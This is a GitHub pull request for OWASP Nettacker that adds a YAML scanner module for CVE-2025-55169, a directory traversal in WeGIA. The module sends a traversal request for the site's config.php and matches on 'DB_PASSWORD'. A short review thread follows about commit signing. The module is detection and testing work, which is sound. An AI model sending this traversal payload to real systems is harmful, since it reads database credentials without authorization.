-
-
Notifications
You must be signed in to change notification settings - Fork 1.1k
New Vulnerability module for CVE_2025_55169 ( WeGIA - Directory Traversal ) #1228
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Open
Aarush289
wants to merge
8
commits into
OWASP:master
Choose a base branch
from
Aarush289:CVE-2025-55169
base: master
Could not load branches
Branch not found: {{ refName }}
Loading
Could not load tags
Nothing to show
Loading
Are you sure you want to change the base?
Some commits from the old base branch may be removed from the timeline,
and old review comments may become outdated.
Open
Changes from 7 commits
Commits
Show all changes
8 commits
Select commit
Hold shift + click to select a range
0cc045d
Merge pull request #4 from OWASP/master
Aarush289 2d91411
New module added
Aarush289 e915815
Spacing fixed
Aarush289 a566b25
Merge branch 'master' into CVE-2025-55169
Aarush289 040bacd
Merge branch 'master' into CVE-2025-55169
Aarush289 47f7ddf
Merge branch 'master' into CVE-2025-55169
Aarush289 7a607a0
Merge branch 'master' into CVE-2025-55169
securestep9 dde27b1
Merge branch 'master' into CVE-2025-55169
Aarush289 File filter
Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,54 @@ | ||
| info: | ||
| name: wegia_cve_2025_55169_vuln | ||
| author: OWASP Nettacker Team | ||
| severity: 10 | ||
| description: | | ||
| WeGIA versions prior to 3.4.8 are vulnerable to a directory traversal | ||
| vulnerability in the download_remessa.php endpoint, allowing unauthenticated | ||
| attackers to read arbitrary files such as config.php which contains | ||
| sensitive database credentials. | ||
| reference: | ||
| - https://nvd.nist.gov/vuln/detail/CVE-2025-55169 | ||
| - https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-mm3p-7573-4x4j | ||
| profiles: | ||
| - vuln | ||
| - http | ||
| - critical_severity | ||
| - cve2025 | ||
| - cve | ||
| - wegia | ||
| - lfi | ||
| - path_traversal | ||
|
|
||
| payloads: | ||
| - library: http | ||
| steps: | ||
| - method: get | ||
| timeout: 3 | ||
| headers: | ||
| User-Agent: "{user_agent}" | ||
| Host: "{target}" | ||
| allow_redirects: false | ||
| ssl: false | ||
| url: | ||
| nettacker_fuzzer: | ||
| input_format: "{{schema}}://{target}:{{ports}}/html/socio/sistema/download_remessa.php?file=../../../www/html/wegia/config.php" | ||
| prefix: "" | ||
| suffix: "" | ||
| interceptors: | ||
| data: | ||
| schema: | ||
| - "http" | ||
| - "https" | ||
| ports: | ||
| - 80 | ||
| - 443 | ||
| response: | ||
| condition_type: and | ||
| conditions: | ||
| status_code: | ||
| regex: "200" | ||
| reverse: false | ||
| content: | ||
| regex: "DB_PASSWORD" | ||
| reverse: false | ||
Oops, something went wrong.
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
The reviewed commit has no
gpgsigheader, andgit verify-commit cc702b0bf46386fb0d4586a87b4e3414b5fe0655fails, so merging it would violate the repository requirement that every commit be signed. Recreate this commit with an accepted signing key before merge.AGENTS.md reference: AGENTS.md:L33-L35
Useful? React with 👍 / 👎.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
all commits are signed